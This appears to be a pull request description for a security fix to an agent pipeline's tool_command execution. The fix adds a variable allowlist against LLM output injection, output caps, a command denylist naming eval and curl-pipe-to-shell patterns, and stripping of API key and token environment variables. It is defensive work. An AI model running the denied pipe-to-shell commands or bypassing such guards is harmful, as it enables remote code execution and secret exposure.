🚧 Files skipped from review as they are similar to previous changes (3)
- pipeline/handlers/tool_safety.go
- agent/exec/local.go
- CLAUDE.md
Summary
P0 critical security fix. Implements four defense-in-depth layers for tool_command execution safety, preventing LLM output injection into shell commands and protecting against malicious .dip files.
Layer 1: Safe-key allowlist (primary security boundary)
Variable expansion in tool_command now uses a fail-closed allowlist: only
outcome,preferred_label,human_response,interview_answerscan be interpolated fromctx.*. All LLM-origin keys (last_response,tool_stdout,response.*, etc.) are blocked with an actionable error message.human_responseis classified as safe (user keyboard input, not LLM output).Layer 2: Output size limits
Tool stdout/stderr capped at 64KB per stream (configurable via
output_limitnode attr). Hard ceiling 10MB (only--max-output-limitCLI can raise). Thread-safelimitedBufferwith truncation marker.Layer 3: Command denylist/allowlist
Built-in denylist blocks dangerous patterns (eval, pipe-to-shell, curl|sh). Matching is per-statement (splits on
;,&&,||, newlines), case-insensitive. Denylist is non-overridable by .dip files — only--bypass-denylistCLI flag can disable it. Optional allowlist via--tool-allowlistortool_commands_allowgraph attr.Layer 4: Environment variable stripping
Sensitive env vars (
*_API_KEY,*_SECRET,*_TOKEN,*_PASSWORD) stripped from tool subprocesses. Override withTRACKER_PASS_ENV=1.CLI flags
--tool-allowlist— comma-separated glob patterns for allowed commands--bypass-denylist— disable built-in denylist (use with caution)--max-output-limit— hard ceiling for output captureDesign review
Spec reviewed by 6-expert security panel (offensive, defensive, Go security, pipeline security, usability, backward compat). Key design changes from review:
human_responsereclassified as safe (user input, not LLM)Test plan
TestExpandVariables_ToolCommandMode_BlocksLLMOutput—last_responseblockedTestExpandVariables_ToolCommandMode_AllowsHumanResponse— user input safeTestExpandVariables_ToolCommandMode_BlocksResponsePrefix—response.*blockedTestExpandVariables_ToolCommandMode_AllowsGraphAndParams— author-controlled keys safeTestExecCommandWithLimit_Truncates— output capped with markerTestCheckCommandDenylist— 12 cases including compound commandsTestCheckCommandAllowlist— pattern restrictionTestBuildToolEnv_StripsAPIKeys— sensitive vars removedTestToolHandler_BlocksTaintedVariable— integration: tainted var → errorTestToolHandler_AllowsSafeVariable— integration: safe var worksTestToolHandler_DenylistBlocks— integration: curl|sh → errorCloses #16
🤖 Generated with Claude Code
Summary by CodeRabbit
New Features
Tests
Documentation